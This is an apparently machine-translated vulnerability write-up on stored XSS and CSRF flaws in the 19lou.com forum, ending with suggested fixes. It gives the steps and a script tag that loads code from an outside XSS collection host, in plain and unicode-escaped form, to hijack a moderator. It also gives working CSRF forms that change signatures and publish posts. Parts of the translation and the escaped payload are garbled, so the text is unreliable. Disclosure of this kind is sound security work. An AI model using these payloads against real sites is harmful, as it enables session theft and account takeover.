Stored squirrel (XSS) on the 19th floor, kms on the 19th floor, and other super moderators

Filtering is not strict somewhere on the 19th floor, resulting in a storage-type XSS in a sensitive place.

In addition, HTTPONLY is included in COOKIES, and a small helper office on the 19th floor is successfully created.

REFERER checks are available for various interfaces on the 19th floor. For various CSRF interfaces, refer ~~~

In the forum, you can find a post to reply to. First, you can write some content and send it out. Then, you can edit it in advanced mode!

Upload an image and click Publish!

Use FIDDLER2 to capture the data of the interface http://www.19lou.com/util/keyword.

Http://www.19lou.com/post/edit this is the key.

 

 

In this POST package, attachments does not strictly filter incoming data.

After testing, you can directly add "> system error in the image address and return the HTTP500 error.

Visually, almost all [{}] and so on can be inserted in the POST with the UNICODE escape of JS. After the escape, it is \ u0022 \ u003e.

We inserted \ u0022 \ u003ebehind the last. PNG in The namespace.

View results

 

 

The vulnerability was detected. Edit it again and add your own JS Code later ~~

"> <Script src = http://xsser.me/UZH56T> </script>

I use this code for testing. The

In that example, after the unicodedefinition of JS is passed, the sample is inserted to the end of .png.

\ Users \ u003e \ u003c \ u0073 \ u0063 \ u0072 \ u0069 \ u0070 \ u0074 \ u0020 \ u0073 \ u0072 \ u0063 \ u003d \ u0068 \ u0074 \ Users \ Users \ u0078 \ u0073 \ u0073 \ u0065 \ u0072 \ Users \ u006d \ u0065 \ u002f \ u0055 \ u005a \ u0048 \ u0035 \ u0036 \ u0054 \ u003e \ Users \ Users \ u0072 \ u0069 \ u0070 \ u0074 \ u003e \ u003c \ u0069 \ u006d \ u0067 \ u0020 \ u0068 \ u0069 \ u0067 \ u0068 \ u003d \ Users \ u0069 \ u0067 \ u0068 \ u0074 \ u003d \ u0030 \ u0020

Smooth insertion ~

 

 

Http://support.19lou.com/forum-10-thread-229001343815994430-1-1.html

One of the victims has successfully attacked a small helper ~

 

Various Permissions

 

 

Results.

 
 

Www.2cto.com

========= CSRF ==========
Change Signature

<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://www.19lou.com/user/sign/save_sign" method = "post">
<Input type = "text" name = "sign_text" value = "XXX"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>

Blog posts

<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://www.19lou.com/user/blog/publish" method = "post">
<Input type = "text" name = "subject" value = "TITLE"/>
<Input type = "text" name = "content" value = "bodybodybodybodybodybodybodybody"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>

There are still a lot of visual CSRF. Check it yourself ~~~~

Solution: XSS:
Filter unicode escape of js in attachments, filter "> and so on.
In addition, for more information about HTTPONLY, see HTTPONLY (http://imlonghao.com/post/2012-08-02/about httponly)

CSRF:
Key Interface Verification Information Source (REFERER), with random TOKEN information in the form.